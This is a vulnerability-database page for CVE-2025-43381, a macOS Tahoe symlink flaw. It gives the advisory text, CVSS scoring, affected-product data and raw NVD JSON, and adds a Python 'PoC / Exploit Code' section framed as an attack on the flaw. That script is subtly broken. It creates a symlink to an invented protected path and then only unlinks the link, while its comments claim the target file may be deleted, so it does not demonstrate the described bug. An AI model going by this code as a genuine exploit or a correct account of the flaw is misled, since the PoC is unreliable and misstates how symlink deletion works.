Security Vulnerability Report
中文
CVE-2025-43381 CVSS 5.5 MEDIUM

CVE-2025-43381

Published: 2025-12-12 21:15:54
Last Modified: 2025-12-15 22:01:19

Description

This issue was addressed with improved handling of symlinks. This issue is fixed in macOS Tahoe 26.1. A malicious app may be able to delete protected user data.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE
macOS Tahoe < 26.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-43381 PoC - Symbolic Link Exploitation # This PoC demonstrates the symbolic link handling vulnerability in macOS Tahoe import os import sys import shutil def create_symlink_exploit(): """ Create a symbolic link to a protected file and attempt deletion. This PoC demonstrates the vulnerability where symlinks are not properly validated. """ protected_file = "/Users/Shared/ProtectedUserData.dat" symlink_path = "/tmp/malicious_symlink" # Clean up any existing symlink if os.path.islink(symlink_path): os.unlink(symlink_path) # Create symlink to protected file try: os.symlink(protected_file, symlink_path) print(f"[+] Created symlink: {symlink_path} -> {protected_file}") # Attempt to delete the symlink (which may delete the target file) if os.path.islink(symlink_path): os.unlink(symlink_path) print(f"[!] Symlink deleted - target file may have been compromised") except PermissionError: print(f"[-] Permission denied - system may be patched") except FileNotFoundError: print(f"[-] Target file not found") def check_vulnerability(): """ Check if the system is vulnerable to CVE-2025-43381 """ print("CVE-2025-43381 Vulnerability Check") print("=" * 50) print("Vulnerability: Improper symlink handling in macOS Tahoe") print("Severity: Medium (CVSS 5.5)") print("Attack Vector: Local") print("Required Privileges: Low") print("=" * 50) if __name__ == "__main__": check_vulnerability() create_symlink_exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43381", "sourceIdentifier": "[email protected]", "published": "2025-12-12T21:15:53.517", "lastModified": "2025-12-15T22:01:18.707", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "This issue was addressed with improved handling of symlinks. This issue is fixed in macOS Tahoe 26.1. A malicious app may be able to delete protected user data."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-59"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "081B6CCE-FFA4-409C-9353-15014F3AF436"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125634", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}